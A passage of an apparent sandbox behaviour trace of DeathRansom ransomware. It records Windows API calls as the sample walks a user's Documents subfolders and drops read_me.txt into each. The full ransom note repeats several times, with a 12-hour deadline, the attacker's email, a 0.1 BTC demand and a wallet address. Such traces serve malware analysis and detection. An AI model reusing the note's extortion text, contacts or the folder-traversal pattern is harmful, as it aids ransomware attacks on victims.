lpNumberOfBytesWritten=0x17d97c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.991] CloseHandle (hObject=0x7c0) returned 1 [0073.991] GetProcessHeap () returned 0x280000 [0073.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0073.991] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ed88da0, ftCreationTime.dwHighDateTime=0x1d4cf34, ftLastAccessTime.dwLowDateTime=0x825e7350, ftLastAccessTime.dwHighDateTime=0x1d4cd76, ftLastWriteTime.dwLowDateTime=0x825e7350, ftLastWriteTime.dwHighDateTime=0x1d4cd76, nFileSizeHigh=0x0, nFileSizeLow=0xe585, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Tuidan8SkuU.pptx", cAlternateFileName="TUIDAN~1.PPT")) returned 1 [0073.992] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.992] WriteFile (in: hFile=0x7bc, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dbf4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17dbf4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.993] CloseHandle (hObject=0x7bc) returned 1 [0073.993] GetProcessHeap () returned 0x280000 [0073.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a10068 | out: hHeap=0x280000) returned 1 [0073.993] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ecd3170, ftCreationTime.dwHighDateTime=0x1d4c60a, ftLastAccessTime.dwLowDateTime=0xad6fb7c0, ftLastAccessTime.dwHighDateTime=0x1d4c97a, ftLastWriteTime.dwLowDateTime=0xad6fb7c0, ftLastWriteTime.dwHighDateTime=0x1d4c97a, nFileSizeHigh=0x0, nFileSizeLow=0xdec5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="I4uAdMQhp.doc", cAlternateFileName="I4UADM~1.DOC")) returned 1 [0073.993] lstrcpyW (in: lpString1=0x8a10068, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9" [0073.993] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 50 [0073.993] QueueUserWorkItem (Function=0x40a710, Context=0x8a10068, Flags=0x0) returned 1 [0073.993] GetProcessHeap () returned 0x280000 [0073.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ba0130 [0073.993] wnsprintfW (in: pszDest=0x8ba0130, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\*") returned 78 [0073.993] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a3c6a70, ftCreationTime.dwHighDateTime=0x1d4d47d, ftLastAccessTime.dwLowDateTime=0xebb23f90, ftLastAccessTime.dwHighDateTime=0x1d4d3f6, ftLastWriteTime.dwLowDateTime=0xebb23f90, ftLastWriteTime.dwHighDateTime=0x1d4d3f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0073.995] lstrcpyW (in: lpString1=0x8ba0130, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp" [0073.995] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 51 [0073.995] QueueUserWorkItem (Function=0x40a710, Context=0x8ba0130, Flags=0x0) returned 1 [0073.995] GetProcessHeap () returned 0x280000 [0073.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0073.996] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\*") returned 76 [0073.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23ed53a0, ftCreationTime.dwHighDateTime=0x1d4cd2f, ftLastAccessTime.dwLowDateTime=0xe9d104c0, ftLastAccessTime.dwHighDateTime=0x1d4d4ac, ftLastWriteTime.dwLowDateTime=0xe9d104c0, ftLastWriteTime.dwHighDateTime=0x1d4d4ac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0073.998] lstrcpyW (in: lpString1=0x8ab00b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2" [0073.998] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 52 [0073.998] QueueUserWorkItem (Function=0x40a710, Context=0x8ab00b8, Flags=0x0) returned 1 [0073.998] GetProcessHeap () returned 0x280000 [0073.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b80038 [0073.998] wnsprintfW (in: pszDest=0x8b80038, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\*") returned 81 [0073.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9eb95340, ftCreationTime.dwHighDateTime=0x1d4cccb, ftLastAccessTime.dwLowDateTime=0xe7a63050, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0xe7a63050, ftLastWriteTime.dwHighDateTime=0x1d4d4be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0074.001] lstrcpyW (in: lpString1=0x8b60028, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0074.001] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 53 [0074.001] QueueUserWorkItem (Function=0x40a710, Context=0x8b60028, Flags=0x0) returned 1 [0074.001] GetProcessHeap () returned 0x280000 [0074.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b80038 [0074.001] wnsprintfW (in: pszDest=0x8b80038, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*") returned 54 [0074.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9eb95340, ftCreationTime.dwHighDateTime=0x1d4cccb, ftLastAccessTime.dwLowDateTime=0xe7a63050, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0xe7a63050, ftLastWriteTime.dwHighDateTime=0x1d4d4be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vyjhhpzcyel8aytj2", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0074.001] wnsprintfW (in: pszDest=0x8b80038, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\read_me.txt") returned 64 [0074.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.001] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.001] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.002] CloseHandle (hObject=0x7a8) returned 1 [0074.002] GetProcessHeap () returned 0x280000 [0074.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b80038 | out: hHeap=0x280000) returned 1 [0074.002] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0074.002] lstrcpyW (in: lpString1=0x8b80038, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0074.002] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 54 [0074.002] QueueUserWorkItem (Function=0x40a710, Context=0x8b80038, Flags=0x0) returned 1 [0074.003] GetProcessHeap () returned 0x280000 [0074.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a800a0 [0074.003] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*") returned 57 [0074.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9eb95340, ftCreationTime.dwHighDateTime=0x1d4cccb, ftLastAccessTime.dwLowDateTime=0xe7a63050, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0xe7a63050, ftLastWriteTime.dwHighDateTime=0x1d4d4be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vyjhhpzcyel8aytj2", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0074.003] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\read_me.txt") returned 67 [0074.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.003] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.003] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.004] CloseHandle (hObject=0x7a8) returned 1 [0074.004] GetProcessHeap () returned 0x280000 [0074.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a800a0 | out: hHeap=0x280000) returned 1 [0074.004] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0074.004] lstrcpyW (in: lpString1=0x8a800a0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0074.004] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 55 [0074.004] QueueUserWorkItem (Function=0x40a710, Context=0x8a800a0, Flags=0x0) returned 1 [0074.004] GetProcessHeap () returned 0x280000 [0074.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a900a8 [0074.005] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned 55 [0074.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.029] lstrcpyW (in: lpString1=0x8b20008, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0074.029] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 56 [0074.029] QueueUserWorkItem (Function=0x40a710, Context=0x8b20008, Flags=0x0) returned 1 [0074.029] GetProcessHeap () returned 0x280000 [0074.029] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0074.029] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*") returned 64 [0074.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x17d990 | out: lpFindFileData=0x17d990*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0074.035] lstrcpyW (in: lpString1=0x8a900a8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0074.035] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 57 [0074.035] QueueUserWorkItem (Function=0x40a710, Context=0x8a900a8, Flags=0x0) returned 1 [0074.035] GetProcessHeap () returned 0x280000 [0074.035] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0074.035] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*") returned 55 [0074.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_private", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0074.035] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\read_me.txt") returned 65 [0074.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x774 [0074.035] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 